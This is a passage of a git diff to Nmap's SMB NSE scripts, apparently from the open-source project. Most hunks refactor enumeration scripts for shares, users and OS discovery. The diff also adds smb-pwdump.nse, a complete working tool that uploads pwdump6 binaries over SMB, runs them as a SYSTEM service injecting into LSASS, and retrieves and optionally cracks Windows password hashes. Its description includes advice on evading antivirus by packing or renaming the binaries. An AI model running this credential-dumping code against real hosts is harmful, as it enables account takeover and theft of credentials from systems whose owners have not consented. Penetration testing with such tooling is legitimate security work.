+2000 anybody (including the anonymous account) can access this, and in Windows 2003 a user 
+or administrator account is required.
 
-WARNING: I have experienced crashes in regsvc.exe while making registry calls against a fully patched Windows 
-2000 system; I've fixed the issue that caused it, but there's no guarantee that it (or a similar vuln in the
-same code) won't show up again.
+I learned the idea and technique for this from sysinternals' tool, PsLoggedOn.exe. I (Ron 
+Bowes) use similar function calls to what they use (although I didn't use their source), 
+so thanks go out to them. Thanks also to Matt Gardenghi, for requesting this script.  
+
+WARNING: I have experienced crashes in regsvc.exe while making registry calls
+against a fully patched Windows 2000 system; I've fixed the issue that caused it,
+but there's no guarantee that it (or a similar vuln in the same code) won't show
+up again. Since the process automatically restarts, it doesn't negatively impact
+the system, besides showing a message box to the user.
 ]]
 
 ---
@@ -221,7 +234,11 @@ local function winreg_enum_rids(host)
 					else
 						result['name'] = lookupsids2_result['names']['names'][1]['name']
 						result['type'] = lookupsids2_result['names']['names'][1]['sid_type']
-						result['domain'] = lookupsids2_result['domains']['domains'][1]['name']
+						if(lookupsids2_result['domains'] ~= nil and lookupsids2_result['domains']['domains'] ~= nil and lookupsids2_result['domains']['domains'][1] ~= nil) then
+							result['domain'] = lookupsids2_result['domains']['domains'][1]['name']
+						else
+							result['domain'] = ""
+						end
 					end
 	
 					if(result['type'] ~= "SID_NAME_WKN_GRP") then -- Don't show "well known" accounts
@@ -242,7 +259,10 @@ local function winreg_enum_rids(host)
 	return true, results
 end
 
+
+--_G.TRACEBACK = TRACEBACK or {}
 action = function(host)
+--    TRACEBACK[coroutine.running()] = true;
 
 	local response = " \n"
 
@@ -258,7 +278,9 @@ action = function(host)
 			response = response .. "|_ <nobody>\n"
 		else
 			for i = 1, #users, 1 do
-				response = response .. string.format("|_ %s\\%s since %s\n", users[i]['domain'], users[i]['name'], users[i]['changed_date'])
+				if(users[i]['name'] ~= nil) then
+					response = response .. string.format("|_ %s\\%s since %s\n", users[i]['domain'], users[i]['name'], users[i]['changed_date'])
+				end
 			end
 		end
 	end
diff --git a/scripts/smb-enum-shares.nse b/scripts/smb-enum-shares.nse
index 63b7162ad..2f72f81fc 100644
--- a/scripts/smb-enum-shares.nse
+++ b/scripts/smb-enum-shares.nse
@@ -1,21 +1,25 @@
 description = [[
 Attempts to list shares using the <code>srvsvc.NetShareEnumAll</code> MSRPC function and
-retrieve more information about them using <code>srvsvc.NetShareGetInfo</code>.
+retrieve more information about them using <code>srvsvc.NetShareGetInfo</code>. If access
+to those functions is denied, a list of common share names are checked. 
+
+Finding open shares is useful to a penetration tester because there may be private files
+shared, or, if it's writable, it could be a good place to drop a Trojan or to infect a file
+that's already there. Knowing where the share is could make those kinds of tests more useful, 
+except that determiing where the share is requires administrative privileges already. 
 
 Running <code>NetShareEnumAll</code> will work anonymously against Windows 2000, and 
 requires a user-level account on any other Windows version. Calling <code>NetShareGetInfo</code> 
-requires an administrator account on every version of Windows I (Ron Bowes) tested. 
+requires an administrator account on all versions of Windows up to 2003, as well as Windows Vista
+and Windows 7, if UAC is turned down. 
 
-Although <code>NetShareEnumAll</code> is restricted on certain systems, making a connection to
-a share to check whether or not it exists will always work. So, if <code>NetShareEnumAll</code> 
-fails, a list of common shares will be checked. 
+Even if <code>NetShareEnumAll</code> is restricted, attempting to connect to a share will always
+reveal its existence. So, if <code>NetShareEnumAll</code> fails, a pre-generated list of shares,
+based on a large test network, are used. If any of those succeed, they are recorded. 
 
-After a list of shares is found, we attempt to connect to each of them anonymously, which lets 
-us divide them into the classes "anonymous" and "restricted." 
-
-When possible, once the list of shares is determined, <code>NetShareGetInfo</code> is called 
-to get additional information on them. Odds are this will fail, unless we're doing an authenticated 
-test. 
+After a list of shares is found, the script attempts to connect to each of them anonymously, 
+which divides them into "anonymous", for shares that the NULL user can connect to, or "restricted",
+for shares that require a user account. 
 ]]
 
 ---
@@ -69,51 +73,6 @@ hostrule = function(host)
 	return smb.get_port(host) ~= nil
 end
 
----Attempts to enumerate the shares on a remote system using MSRPC calls. This will likely fail 
--- against a modern system, but will succeed against Windows 2000. 
---
---@param host The host object. 
---@return Status (true or false).
---@return List of shares (if status is true) or an an error string (if status is false).
-local function samr_enum_shares(host)
-
-	local status, smbstate
-	local bind_result, netshareenumall_result
-	local shares
-	local i, v
-
-	-- Create the SMB session
-	status, smbstate = msrpc.start_smb(host, msrpc.SRVSVC_PATH)
-	if(status == false) then
-		return false, smbstate
-	end
-
-	-- Bind to SRVSVC service
-	status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
-	if(status == false) then
-		smb.stop(smbstate)
-		return false, bind_result
-	end
-
-	-- Call netsharenumall
-	status, netshareenumall_result = msrpc.srvsvc_netshareenumall(smbstate, host.ip)
-	if(status == false) then
-		smb.stop(smbstate)
-		return false, netshareenumall_result
-	end
-
-	-- Stop the SMB session
-	smb.stop(smbstate)
-
-	-- Convert the share list to an array
-	shares = {}
-	for i, v in pairs(netshareenumall_result['ctr']['array']) do
-		shares[#shares + 1] = v['name']
-	end
-
-	return true, shares
-end
-
 ---Attempts to connect to a list of shares as the anonymous user, returning which ones
 -- it has and doesn't have access to. 
 --
@@ -205,42 +164,6 @@ function check_shares(host, shares)
     return true, allowed_shares, denied_shares
 end
 
----Attempts to retrieve additional information about a share. Will fail unless we have 
--- administrative access. 
---
---@param host The host object. 
---@return Status (true or false).
---@return List of shares (if status is true) or an an error string (if status is false).
-local function get_share_info(host, name)
-	local status, smbstate
-	local response = {}
-
-	-- Create the SMB session
-	status, smbstate = msrpc.start_smb(host, msrpc.SRVSVC_PATH)
-	if(status == false) then
-		return false, smbstate
-	end
-
-	-- Bind to SRVSVC service
-	status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
-	if(status == false) then
-		smb.stop(smbstate)
-		return false, bind_result
-	end
-
-	-- Call NetShareGetInfo
-	status, netsharegetinfo_result = msrpc.srvsvc_netsharegetinfo(smbstate, host.ip, name, 2)
-	if(status == false) then
-		smb.stop(smbstate)
-		return false, netsharegetinfo_result
-	end
-
-	smb.stop(smbstate)
-
-	return true, netsharegetinfo_result
-
-end
-
 action = function(host)
 
 	local enum_result
@@ -250,7 +173,7 @@ action = function(host)
 	local allowed, denied
 
 	-- Try and do this the good way, make a MSRPC call to get the shares
-	enum_result, shares = samr_enum_shares(host)
+	enum_result, shares = msrpc.enum_shares(host)
 
 	-- If that failed, try doing it with brute force. This almost certainly won't find everything, but it's the
 	-- best we can do. 
@@ -295,7 +218,7 @@ action = function(host)
 	else
 		response = response .. string.format("Anonymous shares:\n")
 		for i = 1, #allowed, 1 do
-			local status, info = get_share_info(host, allowed[i])
+			local status, info = msrpc.get_share_info(host, allowed[i])
 
 			response = response .. string.format("   %s\n", allowed[i])
 
@@ -317,7 +240,7 @@ action = function(host)
 
 		response = response .. string.format("Restricted shares:\n")
 		for i = 1, #denied, 1 do
-			local status, info = get_share_info(host, denied[i])
+			local status, info = msrpc.get_share_info(host, denied[i])
 
 			response = response .. string.format("   %s\n", denied[i])
 
diff --git a/scripts/smb-enum-users.nse b/scripts/smb-enum-users.nse
index c7217c25f..9d6d7111b 100644
--- a/scripts/smb-enum-users.nse
+++ b/scripts/smb-enum-users.nse
@@ -1,29 +1,37 @@
 description = [[
 Attempts to enumerate the users on a remote Windows system, with as much
 information as possible, through two different techniques (both over MSRPC,
-which uses port 445 or 139). Some SAMR functions are used to enumerate users, 
-and bruteforce LSA guessing is attempted. 
+which uses port 445 or 139; see <code>smb.lua</code>). The goal of this script
+is to discover all user accounts that exist on a remote system. This can be
+helpful for administration, by seeing who has an account on a server, or for 
+penetration testing or network footprinting, by determining which accounts 
+exist on a system. 
 
-By default, both SAMR enumeration and LSA bruteforcing are used; however, these
-can be fine tuned using Nmap parameters. For the most possible information, 
-leave the defaults; however, there are advantages to using them individually. 
+A penetration tester who is examining servers may wish to determine the
+purpose of a server. By getting a list of who has access to it, the tester
+might get a better idea (if financial people have accounts, it probably 
+relates to financial information). Additionally, knowing which accounts
+exist on a system (or on multiple systems) allows the pen-tester to build a
+dictionary of possible usernames for bruteforces, such as a SMB bruteforce
+or a Telnet bruteforce. These accounts may be helpful for other purposes, 
+such as using the accounts in Web applications on this or other servers. 
+
+From a pen-testers perspective, retrieving the list of users on any 
+given server creates endless possibilities. 
+
+Users are enumerated in two different ways:  using SAMR enumeration or 
+LSA bruteforcing. By default, both are used, but they have specific
+advantages and disadvantages. Using both is a great default, but in certain
+circumstances it may be best to give preference to one. 
 
 Advantages of using SAMR enumeration:
-* Stealthier (requires one packet/user account, whereas LSA uses at least 10
-  packets while SAMR uses half that; additionally, LSA makes a lot of noise in 
-  the Windows event log (LSA enumeration is the only script I (Ron Bowes) have 
-  been called on by the administrator of a box I was testing against). 
+* Stealthier (requires one packet/user account, whereas LSA uses at least 10 packets while SAMR uses half that; additionally, LSA makes a lot of noise in the Windows event log (LSA enumeration is the only script I (Ron Bowes) have been called on by the administrator of a box I was testing against). 
 * More information is returned (more than just the username).
-* Every account will be found, since they're being enumerated with a function 
-  that's designed to enumerate users.
+* Every account will be found, since they're being enumerated with a function that's designed to enumerate users.
 
 Advantages of using LSA bruteforcing:
-* More accounts are returned (system accounts, groups, and aliases are returned,
-  not just users).
-* Requires a lower-level account to run on Windows XP and higher (a 'guest' account
-  can be used, whereas SAMR enumeration requires a 'user' account; especially useful
-  when only guest access is allowed, or when an account has a blank password (which 
-  effectively gives it guest access)). 
+* More accounts are returned (system accounts, groups, and aliases are returned, not just users).
+* Requires a lower-level account to run on Windows XP and higher (a 'guest' account can be used, whereas SAMR enumeration requires a 'user' account; especially useful when only guest access is allowed, or when an account has a blank password (which effectively gives it guest access)). 
 
 SAMR enumeration is done with the  <code>QueryDisplayInfo</code> function. 
 If this succeeds, it will return a detailed list of users, along with descriptions,
diff --git a/scripts/smb-os-discovery.nse b/scripts/smb-os-discovery.nse
index 077af793e..ccfcd2eb6 100644
--- a/scripts/smb-os-discovery.nse
+++ b/scripts/smb-os-discovery.nse
@@ -1,8 +1,9 @@
 description = [[
 Attempts to determine the operating system, computer name, domain, and current
-time  over the SMB protocol (ports 445 or 139). This is done by starting a 
-session with the anonymous account (or with a proper user account, if one is 
-given); in response to a session starting, the server will send back all this
+time over the SMB protocol (ports 445 or 139 -- for more information, see 
+<code>smb.lua</code>). This is done by starting a session with the anonymous 
+account (or with a proper user account, if one is given -- likely doesn't make
+a difference); in response to a session starting, the server will send back all this
 information. 
 
 Some systems, like Samba, will blank out their name (and only send their domain). 
@@ -10,6 +11,12 @@ Other systems (like embedded printers) will simply leave out the information. Ot
 systems will blank out various pieces (some will send back '0' for the current
 time, for example). 
 
+Retrieving the name and operating system of a server is a vital step in targeting
+an attack against it, and this script makes that retrieval easy. Additionally, if
+a penetration tester is choosing between multiple targets, the time can help identify
+servers that are being poorly maintained (for more information/random thoughts on
+using the time, see <http://www.skullsecurity.org/blog/?p=76>. 
+
 Although the standard <code>smb*</code> script arguments can be used, 
 they likely won't change the outcome in any meaningful way. 
 ]]
@@ -55,81 +62,17 @@ end
 
 action = function(host)
 
-	local state
-	local status, err
-
-	-- Start up SMB
-	status, state = smb.start(host)
+	local status, result = smb.get_os(host)
 
 	if(status == false) then
 		if(nmap.debugging() > 0) then
-			return "ERROR: " .. state
+			return "smb-os-discovery: ERROR: " .. result
 		else
 			return nil
 		end
 	end
 
-	-- Negotiate protocol
-	status, err = smb.negotiate_protocol(state)
-
-	if(status == false) then
-		stdnse.print_debug(2, "Negotiate session failed")
-		smb.stop(state)
-		if(nmap.debugging() > 0) then
-			return "ERROR: " .. err
-		else
-			return nil
-		end
-	end
-
-	-- Start a session
-	status, err = smb.start_session(state, "")
-	if(status == false) then
-		smb.stop(state)
-		if(nmap.debugging() > 0) then
-			return "ERROR: " .. err
-		else
-			return nil
-		end
-	end
-
-	-- Kill SMB
-	smb.stop(state)
-
-	if(state['os'] == nil and state['lanmanager'] == nil) then
-		if(nmap.debugging() > 0) then
-			return "Server didn't return OS details"
-		else
-			return nil
-		end
-	end
-
-	if(state['os'] == nil) then
-		state['os'] = "Unknown"
-	end
-
-	if(state['lanmanager'] == nil) then
-		state['lanmanager'] = "Unknown"
-	end
-
-	if(state['domain'] == nil) then
-		state['domain'] = "Unknown"
-	end
-
-	if(state['server'] == nil) then
-		state['server'] = "Unknown"
-	end
-
-	if(state['date'] == nil) then
-		state['date'] = "Unknown"
-	end
-
-	if(state['timezone_str'] == nil) then
-		state['timezone_str'] = ""
-	end
-
-	
-	return string.format("%s\nLAN Manager: %s\nName: %s\\%s\nSystem time: %s %s\n", get_windows_version(state['os']), state['lanmanager'], state['domain'], state['server'], state['date'], state['timezone_str'])
+	return string.format("%s\nLAN Manager: %s\nName: %s\\%s\nSystem time: %s %s\n", get_windows_version(result['os']), result['lanmanager'], result['domain'], result['server'], result['date'], result['timezone_str'])
 end
 
 
diff --git a/scripts/smb-pwdump.nse b/scripts/smb-pwdump.nse
new file mode 100644
index 000000000..447958127
--- /dev/null
+++ b/scripts/smb-pwdump.nse
@@ -0,0 +1,513 @@
+description = [[
+This script implements the functionality found in pwdump.exe, written by the Foofus group. 
+Essentially, it works by using pwdump6's modules (servpw.exe and lsremora.dll) to dump the
+password hashes for a remote machine. This currently works against Windows 2000 and Windows 
+2003. 
+
+To run this script, the executable files for pwdump, servpw.exe and lsremora.dll, have to be 
+downloaded. These can be found at <http://foofus.net/fizzgig/pwdump/>, and version 1.6 has been
+tested. Those two files should be placed in nmap's nselib data directory, <code>.../nselib/data/</code>.  
+Note that these files will likely trigger antivirus software -- if you want to get around that, 
+I recommend compiling your own version or obfuscating/encrypting/packing them (upx works wonders). 
+Another possible way around antivirus software is to change the filenames (especially on the remote 
+system -- triggering antivirus on the remote system can land you with some questions to answer). To do 
+that, simply change the <code>FILE*</code> constants in <code>smb-pwdump.nse</code>.
+
+The hashes dumped are Lanman and NTLM, and they're in the format Lanman:NTLM. If one or the other 
+isn't set, it's indicated. These are the hashes that are stored in the SAM file on Windows, 
+and can be used in place of a password to log into systems (this technique is called "passing the
+hash", and can be done in Nmap by using the <code>smbhash</code> argument instead of 
+<code>smbpassword</code> -- see <code>smbauth.lua</code> for more information. 
+
+In addition to directly using the hashes, the hashes can also be cracked. Hashes can be cracked 
+fairly easily with Rainbow Crack (rcrack) or John the Ripper (john). If you intend to crack the 
+hashes without smb-pwdump.nse's help, I suggest setting the <code>strict</code> parameter to '1', which
+tells smb-pwdump.nse to print the hashes in pwdump format (except for the leading pipe '|', which
+Nmap adds). Alternatively, you can tell the script to crack the passwords using the <code>rtable</code>
+argument. For example:
+<code>nmap -p445 --script=smb-pwdump --script-args=smbuser=ron,smbpass=iagotest2k3,rtable=/tmp/alpha/*.rt <host></code>
+
+This assumes that 'rcrack' is installed in a standard place -- if not, the <code>rcrack</code> parameter
+can be set to the path. The charset.txt file from Rainbow Crack may also have to be in the current
+directory. 
+
+This script works by uploading the pwdump6 program to a fileshare, then establishing a connection 
+to the service control service (SVCCTL) and creating a new service, pointing to the pwdump6 program
+(this sounds really invasive, but it's identical to how pwdump6, fgdump, psexec, etc. work). The service
+runs, and sends back the data. Once the service is finished, the script will stop the service and 
+delete the files. 
+
+Obviously, this script is <em>highly</em> intrusive (and requires administrative privileges). 
+It's running a service on the remote machine (with SYSTEM-level access) to accomplish its goals,
+and the service injects itself into the LSASS process to collect the needed information. 
+That being said, extra effort was focused on cleaning up. Unless something really bad happens 
+(which is always possible with a script like this), the service will be removed and the files 
+deleted. 
+
+Currently, this will only run against server versions of Windows (Windows 2000 and Windows 2003). 
+I (Ron Bowes) am hoping to make Windows XP work, but I've had nothing but trouble. Windows Vista
+and higher won't ever work, because they disable the SVCCTL process. 
+
+This script was written mostly to highlight Nmap's growing potential as a pen-testing tool. 
+It complements the <code>smb-brute.nse</code> script because smb-brute can find weak administrator 
+passwords, then smb-pwdump.nse can use those passwords to dump hashes/passwords.  Those can be added
+to the password list for more brute forcing. 
+
+Since this tool can be dangerous, and can easily be viewed as a malicious tool, the usual 
+disclaimer applies -- use this responsibly, and especially don't break any laws with it. 
+
+]]
+
+---
+-- @usage
+-- nmap --script smb-pwdump.nse --script-args=smbuser=<username>,smbpass=<password> -p445 <host>
+-- sudo nmap -sU -sS --script smb-pwdump.nse --script-args=smbuser=<username>,smbpass=<password> -p U:137,T:139 <host>
+--
+-- @output
+-- |  smb-test:  
+-- |  Administrator:500:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC:::
+-- |  ASPNET:1001:359E64F7361B678C283B72844ABF5707:49B784EF1E7AE06953E7A4D37A3E9529:::
+-- |  blankadmin:1003:NO PASSWORD*********************:NO PASSWORD*********************:::
+-- |  blankuser:1004:NO PASSWORD*********************:NO PASSWORD*********************:::
+-- |  Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
+-- |  Ron:1000:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC:::
+-- |_ test:1002:D702A1D01B6BC2418112333D93DFBB4C:C8DBB1CFF1970C9E3EC44EBE2BA7CCBC:::
+-- 
+-- @args rcrack Override the location checked for the Rainbow Crack program. By default, uses the default
+--       directories searched by Lua (the $PATH variable, most likely)
+-- @args rtable Set the path to the Rainbow Tables; for example, <code>/tmp/rainbow/*.rt</code>.
+-- @args strict If set to '1', enable strict output. All output will be in pure pwdump format,
+--       except for the leading pipe. 
+-----------------------------------------------------------------------
+
+author = "Ron Bowes"
+copyright = "Ron Bowes"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"intrusive"}
+
+require 'msrpc'
+require 'smb'
+require 'stdnse'
+require 'nsedebug'
+
+local SERVICE  = "nmap-pwdump"
+local PIPE     = "nmap-pipe"
+
+local FILE1     = "nselib/data/lsremora.dll"
+local FILENAME1 = "lsremora.dll"
+
+local FILE2     = "nselib/data/servpw.exe"
+local FILENAME2 = "servpw.exe"
+
+
+hostrule = function(host)
+	return smb.get_port(host) ~= nil
+end
+
+---Stop/delete the service and delete the service file. This can be used alone to clean up the 
+-- pwdump stuff, if this crashes. 
+function cleanup(host)
+	local status, err
+
+	stdnse.print_debug(1, "Entering cleanup() -- errors here can generally be ignored")
+	-- Try stopping the service
+	status, err = msrpc.service_stop(host, SERVICE)
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't stop service: %s", err)
+	end
+
+--	os.exit()
+
+	-- Try deleting the service
+	status, err = msrpc.service_delete(host, SERVICE)
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't delete service: %s", err)
+	end
+
+	-- Delete the files
+	status, err = smb.file_delete(host, "C$", "\\" .. FILENAME1)
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't delete %s: %s", FILENAME1, err)
+	end
+
+	status, err = smb.file_delete(host, "C$", "\\" .. FILENAME2)
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't delete %s: %s", FILENAME2, err)
+	end
+
+	stdnse.print_debug(1, "Leaving cleanup()")
+
+	return true
+end
+
+
+function upload_files(host)
+	local status, err
+
+	status, err = smb.file_upload(host, FILE1, "C$", "\\" .. FILENAME1)
+	if(status == false) then
+		cleanup(host)
+		return false, string.format("Couldn't upload %s: %s\n", FILE1, err)
+	end
+
+	status, err = smb.file_upload(host, FILE2,   "C$", "\\" .. FILENAME2)
+	if(status == false) then
+		cleanup(host)
+		return false, string.format("Couldn't upload %s: %s\n", FILE2, err)
+	end
+
+	return true
+end
+
+function read_and_decrypt(host, key, pipe)
+	local status, smbstate
+	local results = {}
+
+	-- Create the SMB session
+	status, smbstate = msrpc.start_smb(host, msrpc.SVCCTL_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	local i = 1
+	repeat
+		local status, wait_result, create_result, read_result, close_result
+		results[i] = {}
+
+		-- Wait for some data to show up on the pipe (there's a bit of a race condition here -- if this is called before the pipe is 
+		-- created, it'll fail with a STATUS_OBJECT_NAME_NOT_FOUND. 
+
+		local j = 1
+		repeat
+			status, wait_result = smb.send_transaction_waitnamedpipe(smbstate, 0, "\\PIPE\\" .. pipe)
+			if(status ~= false) then
+				break
+			end
+
+			stdnse.print_debug(1, "WaitForNamedPipe() failed: %s (this may be normal behaviour)", wait_result)
+			j = j + 1
+			-- TODO: Wait 50ms, if there's a time when we get an actual sleep()-style function. 
+		until status == true
+
+		if(j == 100) then
+			smbstop(smbstate)
+			return false, "WaitForNamedPipe() failed, service may not have been created properly."
+		end
+
+		-- Get a handle to the pipe
+		status, create_result = smb.create_file(smbstate, "\\" .. pipe)
+		if(status == false) then
+			smb.stop(smbstate)
+			return false, create_result
+		end
+
+		status, read_result = smb.read_file(smbstate, 0, 1000)
+		if(status == false) then
+			-- TODO: Figure out how to handle errors better
+			return false, read_result
+		else
+			local data = read_result['data']
+			local code = string.byte(string.sub(data, 1, 1))
+			if(code == 0) then
+				break
+			elseif(code == 2) then
+				local cUserBlocks = string.byte(string.sub(data, 3, 3))
+				local userblock = ""
+				for j = 0, cUserBlocks, 1 do
+					local _, a, b = bin.unpack("<II", data, 68 + (j * 8))
+					local encrypted = bin.pack(">II", a, b)
+					local decrypted_hex = openssl.decrypt("blowfish", key, nil, encrypted)
+					_, a, b = bin.unpack("<II", decrypted_hex)
+					userblock = userblock .. bin.pack(">II", a, b)
+				end
+	
+				local password_block = ""
+				for j = 0, 3, 1 do
+					local _, a, b = bin.unpack("<II", data, 4 + (j * 8))
+					local encrypted = bin.pack(">II", a, b)
+					local decrypted_hex = openssl.decrypt("blowfish", key, nil, encrypted)
+					_, a, b = bin.unpack("<II", decrypted_hex)
+					password_block = password_block .. bin.pack(">II", a, b)
+				end
+	
+				_, results[i]['username'] = bin.unpack("z", userblock)
+				_, results[i]['ntlm']     = bin.unpack("H16", password_block)
+				_, results[i]['lm']       = bin.unpack("H16", password_block, 17)
+	
+				if(results[i]['lm'] == "AAD3B435B51404EEAAD3B435B51404EE") then
+					results[i]['lm'] = "NO PASSWORD*********************"
+				end
+	
+				if(results[i]['ntlm'] == "31D6CFE0D16AE931B73C59D7E0C089C0") then
+					results[i]['ntlm'] = "NO PASSWORD*********************"
+				end
+			else
+				stdnse.print_debug(1, "Unknown message code from pwdump: %d", code)
+			end
+		end
+
+		status, close_result = smb.close_file(smbstate)
+		if(status == false) then
+			smb.stop(smbstate)
+			return false, close_result
+		end
+		i = i + 1
+	until(1 == 2)
+
+	smb.stop(smbstate)
+
+	return true, results
+end
+
+-- TODO: Check for OpenSSL
+function go(host)
+	local status, err
+	local results
+	local key
+
+	local key = ""
+	local i
+
+	-- Start by cleaning up, just in case. 
+	cleanup(host)
+
+	-- It seems that, in my tests, if a key contains either a null byte or a negative byte (>= 0x80), errors
+	-- happen. So, at the cost of generating a weaker key (keeping in mind that it's already sent over the 
+	-- network), we're going to generate a key from printable characters only (we could use 0x01 to 0x1F 
+	-- without error, but eh? Debugging is easier when you can type the key in)
+	local key_bytes = openssl.rand_bytes(16)
+	for i = 1, 16, 1 do
+		key = key .. string.char((string.byte(string.sub(key_bytes, i, i)) % 0x5F) + 0x20)
+	end
+
+	-- Upload the files
+	status, err = upload_files(host)
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't upload the files: %s", err)
+		cleanup(host)
+		return false, string.format("Couldn't upload the files: %s", err)
+	end
+
+	-- Create the service
+	status, err = msrpc.service_create(host, SERVICE, "c:\\servpw.exe")
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't create the service: %s", err)
+		cleanup(host)
+
+		return false, string.format("Couldn't create the service on the remote machine: %s", err)
+	end
+
+	-- Start the service
+	status, err = msrpc.service_start(host, SERVICE, {PIPE, key, tostring(string.char(16)), tostring(string.char(0)), "servpw.exe"})
+	if(status == false) then
+		stdnse.print_debug(1, "Couldn't start the service: %s", err)
+		cleanup(host)
+
+		return false, string.format("Couldn't start the service on the remote machine: %s", err)
+	end
+
+	-- Read the data
+	status, results = read_and_decrypt(host, key, PIPE)
+	if(status == false) then
+		stdnse.print_debug(1, "Error reading data from remote service")
+		cleanup(host)
+
+		return false, string.format("Failed to read password data from the remote service: %s", err)
+	end
+
+	-- Clean up what we did
+	cleanup(host)
+
+	return true, results
+end
+
+---Converts an array of accounts to a pwdump-like representation. 
+--@param accounts The accounts array. It should have a list of tables, each with 'username', 'lm', and 'ntlm'. 
+--@param strict   If 'strict' is set to true, a true pwdump representation wiill be used; otherwise, a more user friendly one will. 
+--@return A string in the standard pwdump format. 
+function accounts_to_pwdump(accounts, strict)
+	local str = ""
+
+    for i=1, #accounts, 1 do
+		if(accounts[i]['username'] ~= nil) then
+			if(strict) then
+		        str = str .. string.format("%s:%s:%s:::\n", accounts[i]['username'], accounts[i]['lm'], accounts[i]['ntlm'])
+			else
+				if(accounts[i]['password']) then
+			        str = str .. string.format("%s => %s:%s (Password: %s)\n", accounts[i]['username'], accounts[i]['lm'], accounts[i]['ntlm'], accounts[i]['password'])
+				else
+			        str = str .. string.format("%s => %s:%s\n", accounts[i]['username'], accounts[i]['lm'], accounts[i]['ntlm'])
+				end
+			end
+		end
+    end
+
+	return str
+end
+
+
+---Run the 'rcrack' program and parse the output. This may sound simple, but the output of rcrack clearly
+-- wasn't designed to be scriptable, so it's a little difficult. But, it works, at least for 1.2. 
+function rainbow(accounts, rcrack, rtable)
+	local pwdump = accounts_to_pwdump(accounts, true)
+	local pwdump_file = os.tmpname()
+	local file
+	local command = rcrack .. " " .. rtable .. " -f " .. pwdump_file
+
+	-- Print a warning if 'charset.txt' isn't present
+	file = io.open("charset.txt", "r")
+	if(file == nil) then
+		stdnse.print_debug(1, "WARNING: 'charset.txt' not found in current directory; rcrack may not run properly")
+	else
+		io.close(file)
+	end
+
+	-- Create the pwdump file
+	stdnse.print_debug(1, "Creating the temporary pwdump file (%s)", pwdump_file)
+	file, err = io.open(pwdump_file, "w")
+	if(file == nil) then
+		return false, err
+	end
+	file:write(pwdump)
+	file:close()
+
+	-- Start up rcrack
+	stdnse.print_debug(1, "Starting rcrack (%s)", command)
+	file, err = io.popen(command, "r")
+	if(file == nil) then
+		return false, err
+	end
+
+	for line in file:lines() do
+		stdnse.print_debug(2, "RCRACK: %s\n", line)
+		if(string.find(line, "hex:") ~= nil) then
+			local start_hex1 = 0
+			local start_hex2 = 0
+			local hex1, hex2
+			local ascii1, ascii2
+			local password
+			local i
+
+			-- First, find the last place in the string that starts with "hex:"
+			repeat
+				local _, pos = string.find(line, "  hex:", start_hex1)
+				if(pos ~= nil) then
+					start_hex1 = pos + 1
+				end
+			until pos == nil
+
+			-- Get the first part of the hex
+			if(string.sub(line, start_hex1, start_hex1 + 9) == "<notfound>") then
+				-- If it wasn't found, then set it as such and go to after the "not found" part
+				ascii1 = "<notfound>"
+				start_hex2 = start_hex1 + 10
+			else
+				-- If it was found, convert to ascii
+				ascii1 = bin.pack("H", string.sub(line, start_hex1, start_hex1 + 13))
+				start_hex2 = start_hex1 + 14
+			end
+
+			-- Get the second part of the hex
+			if(string.sub(line, start_hex2) == "") then
+				ascii2 = ""
+			elseif(string.sub(line, start_hex2, start_hex2 + 9) == "<notfound>") then
+				-- It wasn't found
+				ascii2 = "<notfound>"
+			else
+				-- It was found, convert to ascii
+				ascii2 = bin.pack("H", string.sub(line, start_hex2, start_hex2 + 13))
+			end
+
+			-- Join the two halves of the password together
+			password = ascii1 .. ascii2
+
+			-- Figure out the username (it's the part that is followed by a bunch of spaces then the password)
+			i = string.find(line, "  +" .. password)
+
+			username = string.sub(line, 1, i - 1)
+
+			-- Finally, find the username in the account table and add our entry
+			for i=1, #accounts, 1 do
+				if(accounts[i]['username'] ~= nil) then
+					if(string.find(accounts[i]['username'], username .. ":%d+$") ~= nil) then
+						accounts[i]['password'] = password
+					end
+				end
+			end
+		end
+	end
+
+	-- Close the process handle
+	file:close()
+
+	-- Remove the pwdump file
+	os.remove(pwdump_file)
+
+    return true, accounts
+end
+
+action = function(host)
+
+	local status, results
+	local response = " \n"
+	local rcrack = "rcrack"
+	local rtable = nil
+
+	-- Check if we have the necessary files
+	if(nmap.fetchfile(FILE1) == nil or nmap.fetchfile(FILE2) == nil) then
+		local err = " \n"
+		err = err .. string.format("Couldn't run smb-pwdump.nse, missing required file(s):\n")
+		if(nmap.fetchfile(FILE1) == nil) then
+			err = err .. "- " .. FILE1 .. "\n"
+		end
+		if(nmap.fetchfile(FILE2) == nil) then
+			err = err .. "- " .. FILE2 .. "\n"
+		end
+		err = err .. string.format("These are included in pwdump6 version 1.7.2:\n")
+		err = err .. string.format("<http://foofus.net/fizzgig/pwdump/downloads.htm>")
+
+		return err
+	end
+
+	status, results = go(host)
+
+	if(status == false) then
+		return "ERROR: " .. results
+	end
+
+	-- Only try cracking if strict is turned off
+	if(nmap.registry.args.strict == nil) then
+		-- Override the rcrack program
+	    if(nmap.registry.args.rcrack ~= nil) then
+			rcrack = nmap.registry.args.rcrack
+		end
+
+		-- Check if a table was passed
+        if(nmap.registry.args.rtable ~= nil) then
+			rtable = nmap.registry.args.rtable
+		end
+
+		-- Check a spelling mistake that I keep making
+		if(nmap.registry.args.rtables ~= nil) then
+			rtable = nmap.registry.args.rtables
+		end
+
+		-- Check if we actually got a table
+		if(rtable ~= nil) then
+			status, crack_results = rainbow(results, rcrack, rtable)
+			if(status == false) then
+				response = "ERROR cracking: " .. crack_results .. "\n"
+			else
+				results = crack_results
+	        end
+		end
+
+		response = response .. accounts_to_pwdump(results, false)
+	else
+		response = response .. accounts_to_pwdump(results, true)
+    end
+
+	return response
+end
+
+
diff --git a/scripts/smb-security-mode.nse b/scripts/smb-security-mode.nse
index 456a727eb..792d43376 100644
--- a/scripts/smb-security-mode.nse
